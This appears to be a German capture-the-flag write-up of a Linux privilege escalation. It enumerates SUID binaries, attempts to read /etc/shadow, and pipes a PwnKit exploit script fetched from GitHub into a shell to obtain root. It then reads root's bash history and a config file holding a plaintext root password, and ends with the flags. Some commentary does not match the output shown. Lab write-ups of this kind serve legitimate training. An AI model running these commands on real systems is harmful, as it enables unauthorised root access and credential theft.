7733436 44 -rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh
7734425 60 -rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd
7735067 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils
7733434 76 -rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn
7733329 24 -rwsr-xr-x 1 root root 22528 Mar 9 2017 /usr/bin/arping
7734355 40 -rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp
7734989 148 -rwsr-xr-x 1 root root 149080 Jan 17 2018 /usr/bin/sudo
7743666 12 -rwsr-sr-x 1 root root 10232 ct 25 2018 /usr/lib/xorg/Xorg.wrap
7738607 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
7740603 16 -rwsr-xr-x 1 root root 14328 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
7740578 428 -rwsr-xr-x 1 rootroot root 436552 Jan 31 2019 /usr/lib/openssh/ssh-keysign
7738584 44 -rwsr-xr-- 1 root messagebus 42992 Nov 15 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
9568395 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping
9568423 44 -rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su
9568369 144 -rwsr-xr-x 1 root root 146128 Nov 30 2017 /bin/ntfs-3g
9568357 44 -rwsr-xr-x 1 root root 43088 ct 15 2018 /bin/mount
9568443 28 -rwsr-xr-x 1 root root 26696 ct 15 2018 /bin/umount
9568319 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
6030161 12 -rwsr-xr-x 1 root root 8392 Jun 4 2019 /home/user5/script
16778065 12 -rwsr-xr-x 1 root root 8392 Jun 4 2019 /home/user3/shell

Analyse:Die Ausgabe des Befehls "find / -type f -perm -4000 -ls 2>/dev/null" listet alle Dateien auf dem System auf, die das SUID-Bit gesetzt haben. Diese Dateien werden mit den Berechtigungen des Eigentümers (in der Regel root) ausgeführt, was sie zu potenziellen Zielen für Privilege Escalation macht.

Bewertung:Die SUID-Dateien /usr/bin/pkexec und /bin/su sind besonders interessant, da sie häufig für Privilege Escalation-Angriffe verwendet werden.

user6 / | var | www | html
cd /tmp/
user6 / | tmp cat /etc/shadow
cat: /etc/shadow: Permission denied

Analyse:Auch als user6 ist es nicht möglich die shadow datei auszulesen

Bewertung:kein Erfolg

user6 / | tmp
curl
curl: try 'curl --help' or 'curl --manual' for more information

Analyse:Curl wird aufgerufen um sich weiter zu helfen.

Bewertung:der output hilft nicht weiter da der Befehl nicht gefunden wurde

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root / | tmp id
id
uid=0(root) gid=0(root) groups=0(root),1005(user6)
root / | tmp
root / | root | Desktop cat ../.bash_history
cat ../.bash_history

Analyse:Hier wird die bash history vom root ausgelesen

Bewertung:Im der bash history steht was die Person gemacht hat

isohybrid linux-lite-4.4-64bit.iso cd /home/relinux
relinux iso ./relinux.conf
relinux fullclean ./relinux.conf
apt-get clean
apt-get install nfs-kernel-server
service nfs-server start
update-rc.d -f nfs-kernel-server defaults
cat /etc/passwd
ls -al /etc/passwd
usermod -aG root user4
chmod g+w /etc/passwd
gcc shell.c -o shell
adduser user7
chown root:user7 .bash_history
chmod g+r .bash_history
user7 password is user7@12345
chown root:root .bash_history
chmod g+x .bash_history
chmod g+x root
usermod -h
usermod -g root user7
chmod g-r-w,o-r-w root
usermod -aG user7 root
usermod -aG root user7
chmod g+r root
chmod g+w,o+w root
whereis vi
deluser root user7
chmod g+r,o+r root
usermod -h
cat /etc/passwd
usermod -d /var/mysql mysql
service mysql stop
usermod -d /var/mysql mysql
usermod -h
usermod -s /bin/bash mysql

chown mysql:mysql secret.cnf
sudo -u user2 sudo -l
su mysql
happy hacking
halt
root / | root | Desktop find / -user root -name secret.cnf 2>/dev/null
find / -name secret.cnf 2>/dev/null
/etc/mysql/secret.cnf

Analyse:Hier wurde nun der geheim Ordner gefunden

Bewertung:wir kommen dem Ziel immer näher

root / | root | Desktop
cat /etc/mysql/secret.cnf
# This file contain sensitive information Root Credentials : UserName:root PassWord:root@12345

Analyse:im der geheimen Konfigurationsdatei wurden Anmeldedaten gefunden

Bewertung:das Ziel wurde erreicht das Root Passwort wurde gefunden

Privilege Escalation erfolgreich

Flags

cat user.txt c7d0a8de1e03b25a6f7ed2d91b94dad6
cat root.txt 5C42D6BB0EE9CE4CB7E7349652C45C4A